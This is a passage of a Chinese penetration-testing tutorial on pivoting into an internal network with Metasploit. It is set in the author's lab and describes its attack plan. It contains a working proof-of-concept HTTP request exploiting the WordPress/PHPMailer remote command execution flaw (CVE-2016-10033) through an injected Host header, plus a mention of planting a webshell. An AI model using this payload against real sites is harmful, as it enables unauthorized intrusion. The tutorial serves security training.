”什么是内网穿透“详解 _内网穿透

文章插图

在平时护网比赛中，攻坚环境中，渗透测试中，做内网穿透使用的工具有很多如：EW、Cobalt Strike 为了方便小白入门，本次教程通过渗透过程中最常用的MSF攻击框架中socks4做内网穿透代理，实现内网横向渗透。
用本公司的靶场，模拟一个攻坚小场景：
外网IP：112.115.*.* （一台存在wordPress/ target=_blank class=infotextkey>WordPress漏洞的web服务器）
内网：10.0.0.0/24 （模拟开发人员，一台为weblogic漏洞机器，一台为thinkphp漏洞机器）
渗透思路：用MSF对wordpress漏洞进行反弹shell，发现机器位于一个内网，建立socks4线路，横向扫描并对内网其他机器进行渗透并反弹shell
由于socks4做穿透超过3层就会失去流量速度，所以后期我会写一篇用EW或其他穿透工具做多网段多层穿透。
攻击机：kali
目标机：攻坚靶场
首先开启kali，利用Wordpress 4.6 任意命令执行漏洞，对主站服务器进行上传一句话或，直接反弹shell（为了一些教会小白一些提权细节，所以先写入一句话，然后在反弹msf shell）如果自己练习，可以直接msf生成shellcode扔到主站反弹shell 。
0x001 主站渗透
打开主站http://122.115.*.*:8000/介绍一下这个漏洞

文章插图

WordPress <= 4.6命令执行漏洞（PHPMailer）（CVE-2016-10033）WordPress是一种使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress用作一个内容管理系统（CMS）来使用。WordPress使用PHPMailer组件向用户发送邮件。PHPMailer（版本<5.2.18）存在远程命令执行漏洞，攻击者只需轻松地构造出一个恶意邮箱地址，即可写入任意文件，从而造成远程命令执行的危害。POC

假如目标地址为：http : //127.0.0.1 : 8000/

把下面的HTTP报文复制到BurpSuite Repeater中，单击Go按钮，填充目标IP和扩展（例如，IP填充127.0.0.1填充80）

POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)Connection: closeUser-Agent: Mozilla/5.0 (macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0Accept: */*Content-Length: 56Content-Type: Application/x-www-form-urlencodedwp-submit=Get+New+Password&redirect_to=&user_login=admin